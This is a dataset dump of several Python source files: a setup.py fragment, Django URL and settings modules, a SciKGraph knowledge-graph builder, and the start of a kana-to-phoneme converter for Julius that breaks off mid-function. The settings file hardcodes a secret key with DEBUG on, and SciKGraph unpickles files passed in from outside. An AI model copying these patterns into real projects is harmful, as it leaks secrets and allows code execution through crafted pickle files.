"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Scientific/Engineering",
"License :: OSI Approved :: Apache Software License",
],
project_urls={
"Changelog": "https://github.com/aws/aws-parallelcluster/blob/develop/CHANGELOG.md",
"Issue Tracker": "https://github.com/aws/aws-parallelcluster/issues",
"Documentation": "https://docs.aws.amazon.com/parallelcluster/",
},
)
| 34.9375 | 119 | 0.643649 |
79461cd1730cdb3f451b546c2c6cf7b9f58a8d9f | 854 | py | Python | backend/StaticCodeAnalyzer/urls.py | Compro-Prasad/CAST-static-code-analyzer | a3ab84fa7fdc176960a6c535bb8705cedf92bcad | [
"MIT"
] | null | null | null | backend/StaticCodeAnalyzer/urls.py | Compro-Prasad/CAST-static-code-analyzer | a3ab84fa7fdc176960a6c535bb8705cedf92bcad | [
"MIT"
] | 7 | 2021-06-04T21:52:24.000Z | 2022-02-26T11:33:16.000Z | backend/StaticCodeAnalyzer/urls.py | Compro-Prasad/CAST-static-code-analyzer | a3ab84fa7fdc176960a6c535bb8705cedf92bcad | [
"MIT"
] | null | null | null | """StaticCodeAnalyzer URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf.urls import url
from .views import analyze
urlpatterns = [
path('admin/', admin.site.urls),
url(r'^analyze/$', analyze),
]
| 32.846154 | 77 | 0.713115 |
79461cd8df5953d2ccf7ceb01c8b5892a82df91c | 23,426 | py | Python | static/SciKGraph.py | maurodlt/SciKGraph | 83688fbcd827cdec1662760531b1b3e78e09575a | [
"AFL-1.1"
] | 5 | 2020-09-08T21:22:30.000Z | 2022-01-15T10:56:24.000Z | static/bla/SciKGraph.py | maurodlt/SciKGraph | 83688fbcd827cdec1662760531b1b3e78e09575a | [
"AFL-1.1"
] | null | null | null | static/bla/SciKGraph.py | maurodlt/SciKGraph | 83688fbcd827cdec1662760531b1b3e78e09575a | [
"AFL-1.1"
] | 1 | 2021-01-20T20:43:21.000Z | 2021-01-20T20:43:21.000Z | import string
import networkx as nx
import re
import sys
from nltk import word_tokenize, pos_tag
from pybabelfy.babelfy import *
from nltk.stem import PorterStemmer
from math import log
import pickle
import glob
import os
import OClustR as OCR
import operator
#import nltk
class SciKGraph():
def __init__(self):#, BabelfyKey, inputFile, outputDirectory = './', distance_window = 2, language = 'EN', graphType = 'direct'):
#init variables
self.key = ''
self.inputFile = ''
self.outputDirectory = ''
self.distance_window = 0
self.graphName = []
self.dictionaries = []
self.dictionariesCode = []
self.graphsI = []
self.graphsD = []
self.sciKGraph = 0
self.pre_processed_graph = 0
self.dictionaryCodeMerged = {}
self.language = ''
self.deleted_nodes = []
self.deleted_edges = []
self.deleted_isolated_nodes = []
self.name=""
self.clusters = []
self.crisp_clusters = []
self.pre_processed_graph = nx.DiGraph()
#if self.outputDirectory[-1] != '/':
# self.outputDirectory = self.outputDirectory + '/'
#return higher and lower vertices weights
def marginalWeights(self, g):
min = sys.maxsize
max = 0
for n in g:
if g.nodes()[n]['peso'] < min:
min = g.nodes()[n]['peso']
if g.nodes()[n]['peso'] > max:
max = g.nodes()[n]['peso']
return max, min
#rank Concepts
def rank(self, g, dictionaryCodeMerged):
grau = nx.degree_centrality(g)
sorted_grau = sorted(grau.items(), key=operator.itemgetter(1), reverse=True)
sorted_concepts = []
for i in sorted_grau:
#sorted_concepts.append([dictionaryCodeMerged[i[0]], i[0]])
sorted_concepts.append(dictionaryCodeMerged[i[0]].lower().replace('+', ' ') + ' : ' + i[0])
return sorted_concepts
#key Concepts
def key_concepts(self, g, dictionaryCodeMerged):
grau = nx.degree_centrality(g)
sorted_grau = sorted(grau.items(), key=operator.itemgetter(1), reverse=True)
sorted_concepts = []
for i in sorted_grau:
sorted_concepts.append([dictionaryCodeMerged[i[0]], i[1]])
return sorted_concepts
# open and close file
def open_file(self,fileName):
file = open(fileName,"r")
text = file.read()
file.close()
return text
#parse and split text in chuncks of at most 3000 characters
def parse_text(self,text):
#remove special characters
punctuationToRemove = string.punctuation.replace('!','').replace('.','').replace('?','').replace('-','').replace(',','')
translator = str.maketrans('', '', punctuationToRemove)
parsedText = text.translate(translator)
#remove numbers
parsedText = re.sub(r'[0-9]+', '', parsedText)
#remove double spaces
parsedText = re.sub(r' ', ' ', parsedText)
#remove non-printable characters
parsedText = "".join(filter(lambda x: x in string.printable, parsedText))
#remove \t
parsedText = re.sub(r'\t', ' ', parsedText)
#remove spaces
parsedText = re.sub(r' ', '+', parsedText)
#split text in chuncks of at most 5000 characters
punctuation = ['.','?','!']
splitted_text = []
splitted_text.append("")
n_lines = len(parsedText.splitlines())
for line in parsedText.splitlines():
if n_lines == 1:
splitted_text[-1] = line
else:
if len(splitted_text[-1] + line) < 4500 and splitted_text[-1][-1:] not in punctuation or len(splitted_text[-1] + line) <= 3000:
splitted_text[-1] = splitted_text[-1] + '+' + line
else:
splitted_text.append(line)
translator = str.maketrans('', '', "?!.")
for l in splitted_text:
l = l.translate(translator)
return splitted_text
def frag(self,semantic_annotation, input_text):
start = semantic_annotation.char_fragment_start()
end = semantic_annotation.char_fragment_end()
return input_text[start:end+1]
def babelfy(self,lang, key, splitted_text):
babelapi = Babelfy()
#bn = BabelNet(key)
paragraphs_annotations = []
paragraphs_text = []
paragraphs_code = []
count = 0
for paragraph in splitted_text: #annotate each paragraph
words_annotations = []
words_text = []
words_code = []
semantic_annotations = babelapi.disambiguate(paragraph,lang,key,match="EXACT_MATCHING",cands="TOP",mcs="ON",anntype="ALL")
#exclude unused annotations (single words of multiword expressions)
for semantic_annotation in semantic_annotations:
if len(words_annotations) == 0 or words_annotations[-1].char_fragment_end() < semantic_annotation.char_fragment_start():
words_annotations.append(semantic_annotation)
words_text.append(self.frag(semantic_annotation,paragraph))
words_code.append(semantic_annotation.babel_synset_id())
elif words_annotations[-1].char_fragment_start() == semantic_annotation.char_fragment_start():
del words_annotations[-1]
words_annotations.append(semantic_annotation)
del words_text[-1]
words_text.append(self.frag(semantic_annotation,paragraph))
del words_code[-1]
words_code.append(semantic_annotation.babel_synset_id())
paragraphs_annotations.append(words_annotations)
paragraphs_text.append(words_text)
paragraphs_code.append(words_code)
count = count + 1
print(str(count) + '/' + str(len(splitted_text)))
return paragraphs_annotations, paragraphs_text, paragraphs_code
#Create the following Dicts
def create_dicts(self,paragraphs_text, paragraphs_code):
### dictionary[word] = code ###
### dictionaryCode[code] = word ###
### weight[code] = weight ###
dictionary={}
weight={}
dictionaryCode={}
for paragraph, codes in zip(paragraphs_text, paragraphs_code):
for word, code in zip(paragraph, codes):
if code not in weight:
weight[code] = 1
else:
weight[code] = weight[code] + 1
if word not in dictionary:
dictionary[word] = code
if code not in dictionaryCode:
dictionaryCode[code] = word
return dictionary, dictionaryCode, weight
def create_simple_graph(self,peso, paragraphs_code, dictionaryCode, dist):
g = nx.DiGraph() #indirect Graph
        g2 = nx.DiGraph() #direct Graph
        #calc the weight of each vertex
for code, weight in peso.items():
g.add_node(code, peso=weight, dicionario=dictionaryCode[code])
g2.add_node(code, peso=weight, dicionario=dictionaryCode[code])
#create and weight edges
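        #edge weight decays with the word distance inside the window: 1 - log(j-i, dist)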
for line in paragraphs_code:
i = 0
for word in line:
i = i + 1
j = 0
for word2 in line:
j = j + 1
if j - i < dist and j - i > 0: #indirect edges
if g.has_edge(word, word2):
g[word][word2]['weight'] += 1 - log(j-i,dist)
else:
if word != word2:
g.add_edge(word, word2, weight=float(1 - log(j-i,dist)))
if j - i == 1: #direct edges
if g2.has_edge(word, word2):
g2[word][word2]['weight'] += 1
else:
if word != word2:
g2.add_edge(word, word2, weight=1)
return g, g2
def save_clusters_txt(self, saveFile, Clusters):
f=open(saveFile,"w+")
for c in Clusters:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
return
def saveClusters(self, saveFile="", Clusters=[], crisp="", clusterType='normal'):
file = ''
#save clusters
#write crisp
if crisp != "":
with open(saveFile + "crisp.pickle", "wb") as fp:
pickle.dump(crisp, fp, protocol=2)
f=open(saveFile + "crisp.txt","w+")
for c in crisp:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
#write normal clusters
if clusterType =='normal':
with open(saveFile + "clusters.pickle", "wb") as fp:
pickle.dump(Clusters, fp, protocol=2)
f=open(saveFile + "clusters.txt","w+")
for c in Clusters:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
#write reduced clusters
elif clusterType =='reduced':
with open(saveFile + "reducedClusters.pickle", "wb") as fp:
pickle.dump(Clusters, fp, protocol=2)
f=open(saveFile + "reducedClusters.txt","w+")
for c in Clusters:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
else:
print('Wrong cluster Type!\nCluster not saved')
def save_variables_pickle(self):
save = []
save.append(self.graphName)
save.append(self.dictionaries)
save.append(self.dictionariesCode)
save.append(self.graphsI)
save.append(self.graphsD)
save.append(self.dictionaryCodeMerged)
save.append(self.sciKGraph)
save.append(self.crisp_clusters)
save.append(self.pre_processed_graph)
save.append(self.clusters)
file = pickle.dumps(save, protocol=2)
#with open('/home/mauro/Downloads/testeDownload.sckg', "wb") as fp:
# pickle.dump(save, fp, protocol=2)
return file
def save_variables(self,output_file, save_graph_name=False, save_directories = False, save_directories_code = False, save_graphs_i = False, save_graphs_d = False, save_directories_code_merged = False, save_SciKGraph = False, save_clusters = False, save_crisp_clusters = False, save_pre_processed_graph = False):
save = []
save.append(self.graphName)
save.append(self.dictionaries)
save.append(self.dictionariesCode)
save.append(self.graphsI)
save.append(self.graphsD)
save.append(self.dictionaryCodeMerged)
save.append(self.sciKGraph)
save.append(self.crisp_clusters)
save.append(self.pre_processed_graph)
save.append(self.clusters)
try:
with open(output_file, "wb") as fp:
pickle.dump(save, fp, protocol=2)
except:
raise
return
'''
try:
if save_graph_name:
with open(output_directory + "graphName.pickle", "wb") as fp:
pickle.dump(self.graphName, fp)
if save_directories:
with open(output_directory + "dictionaries.pickle", "wb") as fp:
pickle.dump(self.dictionaries, fp)
if save_directories_code:
with open(output_directory + "dictionariesCode.pickle", "wb") as fp:
pickle.dump(self.dictionariesCode, fp)
if save_graphs_i:
with open(output_directory + "graphsI.pickle", "wb") as fp:
pickle.dump(self.graphsI, fp)
if save_graphs_d:
with open(output_directory + "graphsD.pickle", "wb") as fp:
pickle.dump(self.graphsD, fp)
if save_directories_code_merged:
with open(output_directory + "dictionaryCodeMerged.pickle", "wb") as fp:
pickle.dump(self.dictionaryCodeMerged, fp)
if save_SciKGraph:
with open(output_directory + "sciKGraph.pickle", "wb") as fp:
pickle.dump(self.sciKGraph, fp)
if save_clusters:
with open(output_directory + "clusters.pickle", "wb") as fp:
pickle.dump(self.clusters, fp)
if save_crisp_clusters:
with open(output_directory + "crisp_clusters.pickle", "wb") as fp:
pickle.dump(self.crisp_clusters, fp)
if save_pre_processed_graph:
with open(output_directory + "pre_processed_graph.pickle", "wb") as fp:
pickle.dump(self.pre_processed_graph, fp)
except:
raise
'''
def open_variables_pickle(self, file):
data = pickle.load(file)
self.graphName = data[0]
self.dictionaries = data[1]
self.dictionariesCode = data[2]
self.graphsI = data[3]
self.graphsD = data[4]
self.dictionaryCodeMerged = data[5]
self.sciKGraph = data[6]
self.crisp_clusters = data[7]
self.pre_processed_graph = data[8]
self.clusters = data[9]
def open_variables(self,open_directory, open_graph_name=False, open_directories = False, open_directories_code = False, open_graph_i = False, open_graph_d = False, open_dictionary_code_merged = False, open_SciKGraph = False, open_clusters = False, open_crisp_clusters = False, open_pre_processed_graph = False):
with open(open_directory, "rb") as fp:
data = pickle.load(fp)
self.graphName = data[0]
self.dictionaries = data[1]
self.dictionariesCode = data[2]
self.graphsI = data[3]
self.graphsD = data[4]
self.dictionaryCodeMerged = data[5]
self.sciKGraph = data[6]
self.crisp_clusters = data[7]
self.pre_processed_graph = data[8]
self.clusters = data[9]
return
'''
try:
if open_graph_name:
with open (open_directory + "graphName.pickle", 'rb') as fp:
self.graphName = pickle.load(fp)
if open_directories:
with open (open_directory + "dictionaries.pickle", 'rb') as fp:
self.dictionaries = pickle.load(fp)
if open_directories_code:
with open (open_directory + "dictionariesCode.pickle", 'rb') as fp:
self.dictionariesCode = pickle.load(fp)
if open_graph_i:
with open (open_directory + "graphsI.pickle", 'rb') as fp:
self.graphsI = pickle.load(fp)
if open_graph_d:
with open (open_directory + "graphsD.pickle", 'rb') as fp:
self.graphsD = pickle.load(fp)
if open_dictionary_code_merged:
with open (open_directory + "dictionaryCodeMerged.pickle", 'rb') as fp:
self.dictionaryCodeMerged = pickle.load(fp)
if open_SciKGraph:
with open (open_directory + "sciKGraph.pickle", 'rb') as fp:
self.sciKGraph = pickle.load(fp)
if open_clusters:
with open (open_directory + "clusters.pickle", 'rb') as fp:
self.clusters = pickle.load(fp)
if open_crisp_clusters:
with open (open_directory + "crisp_clusters.pickle", 'rb') as fp:
self.crisp_clusters = pickle.load(fp)
if open_pre_processed_graph:
with open (open_directory + "pre_processed_graph.pickle", 'rb') as fp:
self.pre_processed_graph = pickle.load(fp)
except:
raise
'''
def clear_variables(self):
self.key = ''
self.inputFile = ''
self.outputDirectory = ''
self.distance_window = 0
self.graphName = []
self.dictionaries = []
self.dictionariesCode = []
self.graphsI = []
self.graphsD = []
self.sciKGraph = 0
self.pre_processed_graph = 0
self.dictionaryCodeMerged = {}
self.language = ''
self.deleted_nodes = []
self.deleted_edges = []
self.deleted_isolated_nodes = []
self.name=""
self.clusters = []
self.crisp_clusters = []
self.pre_processed_graph = nx.DiGraph()
return
def create_single_SciKGraph(self,filename, babelfy_key, language, distance_window):
text = filename.decode('ascii')
st = self.parse_text(text)
pa, pt, pc = self.babelfy(language, babelfy_key, st)
d, dc, p = self.create_dicts(pt, pc)
gI, gD = self.create_simple_graph(p, pc, dc, distance_window)
return d, dc, gI, gD
#Merges graphs and dictionaries
## graphs: list of graphs to merge
## dictionaryCode: list of the graphs dictionaries
def merge_graphs(self,graphs, dictionaryCode):
#create dictionaryCodeMerged
dictionaryCodeMerged = {}
for dic in dictionaryCode:
for w in dic:
if w not in dictionaryCodeMerged:
dictionaryCodeMerged[w] = dic[w]
#merge graphs
graph = nx.compose_all(graphs).copy()
#reset nodes weights
for i in graph.nodes():
graph.nodes()[i]['peso'] = 0
#recalc nodes weights
for i in range(len(graphs)):
for n in graphs[i]:
graph.nodes()[n]['peso'] += graphs[i].nodes()[n]['peso']
graph.nodes()[n]['dicionario'] = dictionaryCodeMerged[n]
#reset arc weight
for i in graph.edges():
graph[i[0]][i[1]]['weight'] = 0
#recalc arc weight
for i in range(len(graphs)):
for e in graphs[i].edges():
graph[e[0]][e[1]]['weight'] += graphs[i][e[0]][e[1]]['weight']
return graph, dictionaryCodeMerged
def create_SciKGraph(self, files, file_names, babelfy_key = None, language = 'EN', graphType = 'direct', distance_window=2, mergeIfFail = False):
distance_window = distance_window + 1
if distance_window <=2:
graphType = 'direct'
else:
graphType = 'indirect'
self.language = language
#check if scikgraph should be fully updated (occurs when distance window changes)
if self.distance_window != distance_window:
self.distance_window = distance_window
self.graphName = []
toMerge = []
count = 0
added = 0
for file, file_name in zip(files, file_names):
count += 1
if file_name not in self.graphName:
try:
d, dc, gI, gD = self.create_single_SciKGraph(file, babelfy_key, language, distance_window)
self.graphName.append(file_name)
self.dictionaries.append(d)
self.dictionariesCode.append(dc)
self.graphsI.append(gI)
self.graphsD.append(gD)
added += 1
except Exception as e:
if len(self.graphName) > 0 or mergeIfFail:
print('Error Babelfying text (check your Babelcoins)\n', e, '\n')
print(self.graphName, '\nThe documents in \'graphName\' were correctly babelfied.\nThe SciKGraph was created with the correctly babelfied texts, to update this version with the other texts fix the error (probably babelfy key error) and run this method again.')
break
else:
if len(self.graphName) > 0:
print(self.graphName, '\nThe documents in \'graphName\' were correctly babelfied.\nTo create the SciKGraph (using the previously babelfied documents) run this method again.\n')
print('Error Babelfying text (check your Babelcoins)\n')
raise
if graphType == 'direct':
toMerge = self.graphsD
elif graphType == 'indirect':
toMerge = self.graphsI
else:
print('graphType not listed!\nDirect graph used.')
toMerge = self.graphsD
#check if at leat 1 graph can be added to scikgraph
if added > 0:
graph, dictionaryMerged = self.merge_graphs(toMerge, self.dictionariesCode)
self.sciKGraph = graph
self.dictionaryCodeMerged = dictionaryMerged
return self.sciKGraph, self.dictionaryCodeMerged
def find_communities(self, g, edges_threshold, nodes_threshold):
ocr = OCR.OClustR()
self.clusters, self.crisp_clusters, self.pre_processed_graph = ocr.identify_clusters(g, edges_threshold, nodes_threshold)
return self.clusters, self.crisp_clusters, self.pre_processed_graph
def cluster_graph(self, g):
ocr = OCR.OClustR()
self.clusters, self.crisp_clusters, self.sciKGraph = ocr.cluster_graph(g)
return
def pre_process_graph(self, g, edges_threshold, nodes_threshold, list_edges = [], list_nodes = []):
oClustR = OCR.OClustR()
g, rem_e, rem_n, rem_iso_n = oClustR.pre_process(g, edges_threshold, nodes_threshold, list_edges, list_nodes)
self.pre_processed_graph = g
self.deleted_isolated_nodes = rem_iso_n
self.deleted_nodes = rem_n
self.deleted_edges = rem_e
return
def to_crisp(self, Clusters):
##Crisp Cluster
crisp = []
elem = []
for c in Clusters:
cl = []
for v in c:
if v not in elem:
cl.append(v)
elem.append(v)
if len(cl) >= 1:
crisp.append(cl)
return crisp
def start(self, inputDirectory, babelfy_key, edges_threshold=0, nodes_threshold=0, list_nodes = [], list_edges = [], language = 'EN', graphType = 'direct', distance_window=2, mergeIfFail = False):
if babelfy_key == None:
babelfy_key = self.key
filenames = []
try:
for filename in sorted(glob.glob(os.path.join(inputDirectory, '*.txt'))):
filenames.append(filename)
            if len(filenames) == 0:
                raise FileNotFoundError('There is no .txt file in the inputDirectory.')
except:
raise
self.sciKGraph, self.dictionaryCodeMerged = self.create_SciKGraph(filenames, babelfy_key, language, graphType, distance_window, mergeIfFail)
return self.sciKGraph
#oClustR = OCR.OClustR()
#self.clusters, self.crisp_clusters, self.pre_processed_graph = oClustR.identify_clusters(self.sciKGraph, edges_threshold, nodes_threshold)
#return self.clusters, self.pre_processed_graph
| 36.77551 | 315 | 0.565525 |
79461ebf8433b867d5c8b35acd21b5a0727644f3 | 3,408 | py | Python | mirror_to_do_list/settings.py | hadeel36/Mirror-to-do-list | b2b018e3771357005068f355d60a95313874e16d | [
"MIT"
] | null | null | null | mirror_to_do_list/settings.py | hadeel36/Mirror-to-do-list | b2b018e3771357005068f355d60a95313874e16d | [
"MIT"
] | null | null | null | mirror_to_do_list/settings.py | hadeel36/Mirror-to-do-list | b2b018e3771357005068f355d60a95313874e16d | [
"MIT"
] | null | null | null | """
Django settings for mirror_to_do_list project.
Generated by 'django-admin startproject' using Django 1.11.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'f*0yo97bbi3_a4s4!600mz-3b16csm*mnx^=p^$=$po5me@97$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'todos.apps.TodosConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mirror_to_do_list.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mirror_to_do_list.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
import dj_database_url
DATABASES = {'default': dj_database_url.config()}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'todolist',
# 'USER': 'root',
# 'PASSWORD': '123456',
# 'HOST': '',
# 'PORT': ''
# }
# }
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# Configure Django App for Heroku.
import django_heroku
django_heroku.settings(locals())
| 25.62406 | 91 | 0.689847 |
79461f8faaa95d45a1614a1c45442f3cd414e6dc | 16,192 | py | Python | julius4seg/sp_inserter.py | yamachu/julius4seg | 2d701f451d854aa9ed00cd7c1a0cf5ecfa83b036 | [
"MIT"
] | 7 | 2018-04-15T09:02:09.000Z | 2021-11-07T08:29:22.000Z | julius4seg/sp_inserter.py | yamachu/julius4seg | 2d701f451d854aa9ed00cd7c1a0cf5ecfa83b036 | [
"MIT"
] | 2 | 2020-01-22T17:21:09.000Z | 2020-02-16T20:26:44.000Z | julius4seg/sp_inserter.py | yamachu/julius4seg | 2d701f451d854aa9ed00cd7c1a0cf5ecfa83b036 | [
"MIT"
] | 2 | 2018-04-16T21:50:51.000Z | 2020-01-21T16:03:39.000Z | import os
import re
import sys
import subprocess
from itertools import chain
from pathlib import Path, PurePath
from logging import getLogger, DEBUG, NullHandler
logger = getLogger(__name__)
logger.addHandler(NullHandler())
logger.setLevel(DEBUG)
logger.propagate = False
# MUST CHANGE
JULIUS_ROOT = PurePath('.')
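# JULIUS_ROOT is joined below with 'model/phone_m/...' and 'bin/<os>/...', so point it at the root of a segmentation-kit style Julius install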
def get_os_dependent_directory() -> str:
    '''Get the Julius Segmentation Kit directory name for the current OS
    returns:
        (str): OS-dependent part of the path
'''
if sys.platform.startswith('win') or sys.platform.startswith('cygwin'):
return 'windows'
elif sys.platform.startswith('darwin'):
return 'osx'
elif sys.platform.startswith('linux'):
return 'linux'
def get_os_dependent_exec() -> str:
    '''Get the name of the Julius executable
    returns:
        (str): Julius executable file name
'''
if sys.platform.startswith('win') or sys.platform.startswith('cygwin'):
return 'julius.exe'
else:
return 'julius'
def kata2hira(kana: str) -> str:
    '''Convert katakana to hiragana, except ヴ, ヵ and ヶ
    args:
        kana(str): katakana string
            "ヤキニク"
    returns:
        (str): hiragana string
            "やきにく"
'''
return ''.join([chr(ord(c) + ord('あ') - ord('ア')) if c != 'ー' else 'ー' for c in kana])
def conv2julius(s: str) -> str:
    '''Convert the reading of an input word (hiragana) into a Julius phoneme sequence
    args:
        s (str): hiragana reading of the word
            "やきにく"
    returns:
        (str): phoneme sequence
            " y a k i n i k u"
'''
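    # multi-kana sequences (youon and long vowels) are replaced first so the single-kana rules below do not split them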
s = s.replace('あぁ',' a a')
s = s.replace('いぃ',' i i')
s = s.replace('いぇ',' i e')
s = s.replace('いゃ',' y a')
s = s.replace('うぅ',' u:')
s = s.replace('えぇ',' e e')
s = s.replace('おぉ',' o:')
s = s.replace('かぁ',' k a:')
s = s.replace('きぃ',' k i:')
s = s.replace('くぅ',' k u:')
s = s.replace('くゃ',' ky a')
s = s.replace('くゅ',' ky u')
s = s.replace('くょ',' ky o')
s = s.replace('けぇ',' k e:')
s = s.replace('こぉ',' k o:')
s = s.replace('がぁ',' g a:')
s = s.replace('ぎぃ',' g i:')
s = s.replace('ぐぅ',' g u:')
s = s.replace('ぐゃ',' gy a')
s = s.replace('ぐゅ',' gy u')
s = s.replace('ぐょ',' gy o')
s = s.replace('げぇ',' g e:')
s = s.replace('ごぉ',' g o:')
s = s.replace('さぁ',' s a:')
s = s.replace('しぃ',' sh i:')
s = s.replace('すぅ',' s u:')
s = s.replace('すゃ',' sh a')
s = s.replace('すゅ',' sh u')
s = s.replace('すょ',' sh o')
s = s.replace('せぇ',' s e:')
s = s.replace('そぉ',' s o:')
s = s.replace('ざぁ',' z a:')
s = s.replace('じぃ',' j i:')
s = s.replace('ずぅ',' z u:')
s = s.replace('ずゃ',' zy a')
s = s.replace('ずゅ',' zy u')
s = s.replace('ずょ',' zy o')
s = s.replace('ぜぇ',' z e:')
s = s.replace('ぞぉ',' z o:')
s = s.replace('たぁ',' t a:')
s = s.replace('ちぃ',' ch i:')
s = s.replace('つぁ',' ts a')
s = s.replace('つぃ',' ts i')
s = s.replace('つぅ',' ts u:')
s = s.replace('つゃ',' ch a')
s = s.replace('つゅ',' ch u')
s = s.replace('つょ',' ch o')
s = s.replace('つぇ',' ts e')
s = s.replace('つぉ',' ts o')
s = s.replace('てぇ',' t e:')
s = s.replace('とぉ',' t o:')
s = s.replace('だぁ',' d a:')
s = s.replace('ぢぃ',' j i:')
s = s.replace('づぅ',' d u:')
s = s.replace('づゃ',' zy a')
s = s.replace('づゅ',' zy u')
s = s.replace('づょ',' zy o')
s = s.replace('でぇ',' d e:')
s = s.replace('どぉ',' d o:')
s = s.replace('なぁ',' n a:')
s = s.replace('にぃ',' n i:')
s = s.replace('ぬぅ',' n u:')
s = s.replace('ぬゃ',' ny a')
s = s.replace('ぬゅ',' ny u')
s = s.replace('ぬょ',' ny o')
s = s.replace('ねぇ',' n e:')
s = s.replace('のぉ',' n o:')
s = s.replace('はぁ',' h a:')
s = s.replace('ひぃ',' h i:')
s = s.replace('ふぅ',' f u:')
s = s.replace('ふゃ',' hy a')
s = s.replace('ふゅ',' hy u')
s = s.replace('ふょ',' hy o')
s = s.replace('へぇ',' h e:')
s = s.replace('ほぉ',' h o:')
s = s.replace('ばぁ',' b a:')
s = s.replace('びぃ',' b i:')
s = s.replace('ぶぅ',' b u:')
s = s.replace('ふゃ',' hy a')
s = s.replace('ぶゅ',' by u')
s = s.replace('ふょ',' hy o')
s = s.replace('べぇ',' b e:')
s = s.replace('ぼぉ',' b o:')
s = s.replace('ぱぁ',' p a:')
s = s.replace('ぴぃ',' p i:')
s = s.replace('ぷぅ',' p u:')
s = s.replace('ぷゃ',' py a')
s = s.replace('ぷゅ',' py u')
s = s.replace('ぷょ',' py o')
s = s.replace('ぺぇ',' p e:')
s = s.replace('ぽぉ',' p o:')
s = s.replace('まぁ',' m a:')
s = s.replace('みぃ',' m i:')
s = s.replace('むぅ',' m u:')
s = s.replace('むゃ',' my a')
s = s.replace('むゅ',' my u')
s = s.replace('むょ',' my o')
s = s.replace('めぇ',' m e:')
s = s.replace('もぉ',' m o:')
s = s.replace('やぁ',' y a:')
s = s.replace('ゆぅ',' y u:')
s = s.replace('ゆゃ',' y a:')
s = s.replace('ゆゅ',' y u:')
s = s.replace('ゆょ',' y o:')
s = s.replace('よぉ',' y o:')
s = s.replace('らぁ',' r a:')
s = s.replace('りぃ',' r i:')
s = s.replace('るぅ',' r u:')
s = s.replace('るゃ',' ry a')
s = s.replace('るゅ',' ry u')
s = s.replace('るょ',' ry o')
s = s.replace('れぇ',' r e:')
s = s.replace('ろぉ',' r o:')
s = s.replace('わぁ',' w a:')
s = s.replace('をぉ',' o:')
s = s.replace('ゔ',' b u')
s = s.replace('でぃ',' d i')
s = s.replace('でぇ',' d e:')
s = s.replace('でゃ',' dy a')
s = s.replace('でゅ',' dy u')
s = s.replace('でょ',' dy o')
s = s.replace('てぃ',' t i')
s = s.replace('てぇ',' t e:')
s = s.replace('てゃ',' ty a')
s = s.replace('てゅ',' ty u')
s = s.replace('てょ',' ty o')
s = s.replace('すぃ',' s i')
s = s.replace('ずぁ',' z u a')
s = s.replace('ずぃ',' z i')
s = s.replace('ずぅ',' z u')
s = s.replace('ずゃ',' zy a')
s = s.replace('ずゅ',' zy u')
s = s.replace('ずょ',' zy o')
s = s.replace('ずぇ',' z e')
s = s.replace('ずぉ',' z o')
s = s.replace('きゃ',' ky a')
s = s.replace('きゅ',' ky u')
s = s.replace('きょ',' ky o')
s = s.replace('しゃ',' sh a')
s = s.replace('しゅ',' sh u')
s = s.replace('しぇ',' sh e')
s = s.replace('しょ',' sh o')
s = s.replace('ちゃ',' ch a')
s = s.replace('ちゅ',' ch u')
s = s.replace('ちぇ',' ch e')
s = s.replace('ちょ',' ch o')
s = s.replace('とぅ',' t u')
s = s.replace('とゃ',' ty a')
s = s.replace('とゅ',' ty u')
s = s.replace('とょ',' ty o')
s = s.replace('どぁ',' d o a')
s = s.replace('どぅ',' d u')
s = s.replace('どゃ',' dy a')
s = s.replace('どゅ',' dy u')
